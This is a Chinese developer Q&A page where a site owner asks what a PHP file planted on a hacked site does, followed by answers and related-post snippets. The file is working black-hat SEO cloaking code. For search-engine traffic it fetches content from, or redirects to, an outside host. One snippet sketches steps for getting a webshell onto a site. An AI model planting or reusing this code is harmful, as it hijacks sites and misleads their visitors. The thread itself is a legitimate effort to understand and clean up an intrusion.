2 weguiding WeGuiding 于 2017.01.10 09:05 提问

网站被入侵,这段代码具体作用是啥,求大神解答

<?php
set_time_limit(20);error_reporting(0);

define('u_b','/');

define('s_u','http://jc.dy2030.com/');

define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');

define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());

function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}

if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
?>

3个回答

lckx1
lckx1   2017.01.10 10:02

看着像是一个黑帽SEO的蠕虫,当360的搜索引擎来爬你网站的时候,他会返回http://jc.dy2030.com/'这个页面的内容,这样会帮他提高网站的关键词

u013270289
u013270289   2017.01.16 16:21

这就是传说中的挂马,把类似的文件都删除,安全权限调高,别开放所有的读写

q1343454666
q1343454666   2017.03.01 13:59

楼上说的我都看着笑了。这明显是代码加密后显示的样子

Csdn user default icon
上传中...
上传图片
插入图片
准确详细的回答,更有利于被提问者采纳,从而获得C币。复制、灌水、广告等回答会被删除,是时候展现真正的技术了!
其他相关推荐
java 和 Flex 之间的Socket通信
<br />示例:并采用了amf二进制压缩的传输方式。<br />flex端代码:<br /><?xml version="1.0" encoding="utf-8"?><br /><s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" <br />      xmlns:s="library://ns.adobe.com/flex/spark" <br />      xmlns:mx="library://ns.adobe.com/flex/mx"
我的网站被人入侵了,文件被添加了广告代码,请问怎么解决
我的网站被人入侵了,文件被添加了广告代码,请问怎么解决。希望大家能帮我。在下不盛感激。
webpack什么作用
聊一聊,什么是webpack? 打包机,她会分析我们的项目,找到javascript模块和其他的一些浏览器不能直接运行的语言,例如scss,typescript等,她会把他们转换和打包成为合适的格式,这样浏览器就可以看懂了。 类似的打包机有哪些? webpack,Grunt,Gulp。 他们有啥区别呢? Grunt和Gulp是一种优化前段开发流程的工具,在一个配置文件中,指明对某些文件进...
标签控件的使用
<br />1。建立对话框资源,添加标签控件IDC_TAB1,在标签控件下面添加静态框IDC_STATIC_DLG作为标签页的显示位置区域。<br />2。标签上面不能直接像对话框一样的拖入相应的空间,所以我们要想在不同的标签页显示内容,就要重新创建对话框,注意,重新创建的对话框dialog的个数应该和你的标签数是一致的,这里我创建了两个标签,所以我又import了两个对话框:IDD_JIAMIDIALOG和IDD_JIEMIDIALOG,属性styles中设置:style为Child,Border设置为N
某大牛的入侵实战经验总结
不分语言,只谈拿webshell,至于提权,这里不说 1.无论什么站,无论什么语言,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多! 2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就
利用C#打开EXCEL并将数据更新保
这段代码的作用是利用C#打开EXCEL,并将数据更新保存。
一个被入侵网站分析报告
一个被入侵网站分析报告 [ 作者: sword_martin   添加时间: 2001-9-4 14:13:05 ]来源:http://LinuxAid.com.cn              注:这篇文章是我在浏览某个安全方面的论坛时偶尔发现的,这个哥们用给ISP兼职网络安全顾问的方式来换取免费上网。当然,他的工作是尽职尽力的,否则他也就不会发现这些问题了,他发现问题的过程及解决
如何防止网站被侵入,如何防止网站被挂马,如何防止网站被入侵?
一:挂马预防措施: 1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。 2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程 序,只要可以上传文件的asp都要进行身份认证! 3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。 4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进...
博士黑客入侵游戏网站牟利400余万 结婚前被抓
两年“潜伏”某游戏网站,利用网络漏洞修改消费点数牟利四百余万元。近日,南京玄武警方在“春雷行动”中,挖出了一名顶级网络黑客——徐放,他的身份是国外某大学的研究员。徐放落网后交代,他将作案视作对自己计算机水平的一种检验,“我就想看看,以我的水平,要多久才会被人发现,我认为警察永远找不到我”。目前,徐放已被玄武警方刑事拘留。 特约记者 杨维斌快报记者 陶维洲 【案发】 “虚拟银行”多出亿两“银子
实例入侵网站数据库
在写这篇文章之前,有必要对"注入"一词阐述一下。区别于通常的SQL注入,这里的注入实际上只是构造HTTP请求报文,以程序的方式代替WEB提交页面,实现数据的自动提交。嘿嘿,说到这,我看到你诡异的笑容了,我们只要写个循环,用什么语言你说了算,向特定的WEB页面发送HTTP报文,只要几分钟,呵呵他的本本就爆了,而且......嘿、嘿、嘿......偶喝杯茶,接下再写。     首先,还是温习一下